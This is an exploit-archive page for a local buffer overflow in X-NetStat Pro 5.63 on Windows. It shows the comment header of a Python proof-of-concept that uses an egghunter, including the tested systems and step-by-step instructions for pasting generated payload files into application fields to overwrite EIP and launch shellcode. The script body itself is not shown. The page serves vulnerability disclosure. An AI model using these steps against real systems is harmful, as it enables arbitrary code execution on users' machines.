Xnetstat pro 5.63 local buffer overflow Vulnerability / Exploit
Exploits / Vulnerability Discovered: 2019-03-25 | Type: local | Platform: windows
This exploit / vulnerability (Xnetstat pro 5.63 local buffer overflow) is for educational purposes only; if you use it, you do so at your own risk!
[+] Code ...
#!/usr/bin/env python
#---------------------------------------------------------------------------------------------------------#
# Exploit: X-NetStat Pro 5.63 - Local Buffer Overflow (EggHunter)
# Date: 2019-03-23
# Author: Peyman Forouzan
# Tested Against: WinXP SP2 32/64-bit - Win7 Enterprise SP1 32/64-bit - Win10 Enterprise 32/64-bit
# Vendor Homepage: https://freshsoftware.com
# Software Download: https://www.freshsoftware.com/files/xns56p_setup.exe
# Version: 5.63
# Special Thanks to my wife
# The program has a local buffer overflow in several places.
# Note: Although simpler approaches to this vulnerability exist, the EggHunter technique
# was used so that the same payload works across different Windows versions.
# Steps:
# 1- Run the Python script: X-NetStat.py (three files are created)
# 2- App --> Tools --> HTTP Client --> paste the contents of egg.txt into "URL"
#    --> Enter --> close the HTTP Client window.
# 3- Rules --> Add New Rule --> Actions --> paste the contents of egghunter-winxp-win7.txt
#    or egghunter-win10.txt (depending on your Windows version) into "Run Program" --> OK
#    --> wait a little --> shellcode (calc) opens
# Alternatively, instead of the third step you can:
#    File --> Import / Resolve bulk IP List ... --> paste the contents of egghunter-winxp-win7.txt
#    or egghunter-win10.txt (depending on your Windows version) into "IP List (One IP per Line)" -->
#    then press the Open File (folder) icon --> wait a little --> shellcode (calc) opens
#---------------------------------------------------------------------------------------------------------#
# "Egg" shellcode placed into memory --> EggHunter field overflow: EIP overwrite
#---------------------------------------------------------------------------------------------------------#